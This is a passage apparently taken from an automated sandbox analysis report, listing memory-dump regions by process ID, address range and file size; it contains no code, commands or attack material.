                                                                                                                                                                                                                                                            1.4MB

                                                                                                                                                                                                                                                          • memory/1416-390-0x0000025972940000-0x00000259729B2000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/1532-229-0x0000000000520000-0x0000000000521000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/1532-246-0x0000000000E80000-0x0000000000E81000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/1532-252-0x0000000004E10000-0x0000000004E11000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/1620-257-0x0000000000400000-0x0000000002F22000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            43.1MB

                                                                                                                                                                                                                                                          • memory/1620-233-0x0000000002F30000-0x000000000307A000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                                          • memory/1620-217-0x00000000032B8000-0x00000000032E1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            164KB

                                                                                                                                                                                                                                                          • memory/1836-391-0x000001A9D0C10000-0x000001A9D0C82000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/1860-256-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/1980-331-0x0000000006390000-0x00000000064DC000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                                          • memory/2108-190-0x0000000000830000-0x0000000000831000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2108-204-0x0000000002730000-0x0000000002732000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                          • memory/2140-231-0x0000000000D60000-0x0000000000D61000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2140-255-0x0000000005800000-0x0000000005801000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2180-597-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2208-219-0x0000000002970000-0x0000000002971000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2208-291-0x00000000081E0000-0x00000000081E1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2208-428-0x000000007F090000-0x000000007F091000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2208-221-0x0000000002970000-0x0000000002971000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2208-259-0x0000000006830000-0x0000000006831000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2208-448-0x0000000006833000-0x0000000006834000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2208-261-0x0000000006832000-0x0000000006833000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2304-208-0x00000000018D9000-0x0000000001928000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            316KB

                                                                                                                                                                                                                                                          • memory/2304-248-0x0000000000400000-0x00000000016FB000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            19.0MB

                                                                                                                                                                                                                                                          • memory/2304-227-0x0000000003360000-0x00000000033EE000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            568KB

                                                                                                                                                                                                                                                          • memory/2368-263-0x0000000005190000-0x0000000005191000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2368-230-0x0000000000710000-0x0000000000711000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2420-610-0x00000204CCC50000-0x00000204CCCC2000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/2420-377-0x00000204CCB60000-0x00000204CCBD2000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/2460-374-0x0000013481560000-0x00000134815D2000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/2664-394-0x000002034C140000-0x000002034C1B2000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/2684-395-0x000001B295380000-0x000001B2953F2000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/2828-368-0x000001BFA1880000-0x000001BFA18F2000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/2880-250-0x0000000002640000-0x0000000002641000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2880-232-0x00000000002C0000-0x00000000002C1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2880-240-0x0000000004B40000-0x0000000004B41000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2880-251-0x0000000004C40000-0x0000000004C41000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/2880-265-0x0000000005150000-0x0000000005151000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3000-170-0x0000000000A90000-0x0000000000A91000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3000-168-0x0000000000A90000-0x0000000000A91000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3032-312-0x00000000005B0000-0x00000000005C6000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            88KB

                                                                                                                                                                                                                                                          • memory/3108-214-0x00000000031C8000-0x00000000031D1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            36KB

                                                                                                                                                                                                                                                          • memory/3108-258-0x0000000000400000-0x0000000002F02000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            43.0MB

                                                                                                                                                                                                                                                          • memory/3108-228-0x0000000002F10000-0x0000000002FBE000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            696KB

                                                                                                                                                                                                                                                          • memory/3216-506-0x0000000005040000-0x00000000050ED000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            692KB

                                                                                                                                                                                                                                                          • memory/3216-509-0x00000000051A0000-0x000000000524D000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            692KB

                                                                                                                                                                                                                                                          • memory/3736-144-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                          • memory/3736-136-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                          • memory/3736-139-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                          • memory/3736-140-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                          • memory/3736-143-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                          • memory/3736-142-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.5MB

                                                                                                                                                                                                                                                          • memory/3736-145-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            152KB

                                                                                                                                                                                                                                                          • memory/3736-141-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                          • memory/3736-138-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            572KB

                                                                                                                                                                                                                                                          • memory/3736-137-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            572KB

                                                                                                                                                                                                                                                          • memory/3736-134-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            572KB

                                                                                                                                                                                                                                                          • memory/3736-135-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            100KB

                                                                                                                                                                                                                                                          • memory/3808-238-0x0000000004A20000-0x0000000004A21000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3808-222-0x0000000003010000-0x0000000003011000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3808-260-0x0000000004AC2000-0x0000000004AC3000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3808-271-0x0000000007BE0000-0x0000000007BE1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3808-264-0x0000000007390000-0x0000000007391000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3808-284-0x0000000008120000-0x0000000008121000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3808-242-0x00000000074D0000-0x00000000074D1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3808-447-0x0000000004AC3000-0x0000000004AC4000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3808-245-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3808-275-0x0000000007D50000-0x0000000007D51000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3808-220-0x0000000003010000-0x0000000003011000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3808-268-0x0000000007B70000-0x0000000007B71000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3808-431-0x000000007F240000-0x000000007F241000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3828-223-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                          • memory/3904-600-0x0000000003530000-0x0000000003531000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3904-604-0x0000000003520000-0x0000000003521000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3904-605-0x0000000003520000-0x0000000003521000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/3984-347-0x000001B679420000-0x000001B67946D000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            308KB

                                                                                                                                                                                                                                                          • memory/3984-348-0x000001B6797B0000-0x000001B679822000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/4104-293-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            136KB

                                                                                                                                                                                                                                                          • memory/4104-330-0x00000000050C0000-0x00000000056C6000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                          • memory/4104-309-0x0000000005100000-0x0000000005101000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/4104-306-0x00000000056D0000-0x00000000056D1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/4116-606-0x0000000076F30000-0x00000000770BE000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                          • memory/4128-279-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                          • memory/4140-327-0x0000000004D70000-0x0000000005376000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                          • memory/4140-295-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            136KB

                                                                                                                                                                                                                                                          • memory/4200-609-0x0000000000030000-0x0000000000033000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            12KB

                                                                                                                                                                                                                                                          • memory/4260-286-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/4268-371-0x000001A802100000-0x000001A802172000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            456KB

                                                                                                                                                                                                                                                          • memory/4268-538-0x000001A804900000-0x000001A804A05000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.0MB

                                                                                                                                                                                                                                                          • memory/4268-535-0x000001A803920000-0x000001A80393B000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            108KB

                                                                                                                                                                                                                                                          • memory/4484-339-0x0000000004ED0000-0x00000000054D6000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                          • memory/4928-594-0x0000000002610000-0x0000000002611000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                          • memory/4928-590-0x0000000002450000-0x00000000024B0000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            384KB

                                                                                                                                                                                                                                                          • memory/5008-344-0x0000000004F80000-0x0000000005081000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            1.0MB

                                                                                                                                                                                                                                                          • memory/5008-346-0x0000000004EA0000-0x0000000004EFD000-memory.dmp

                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                            372KB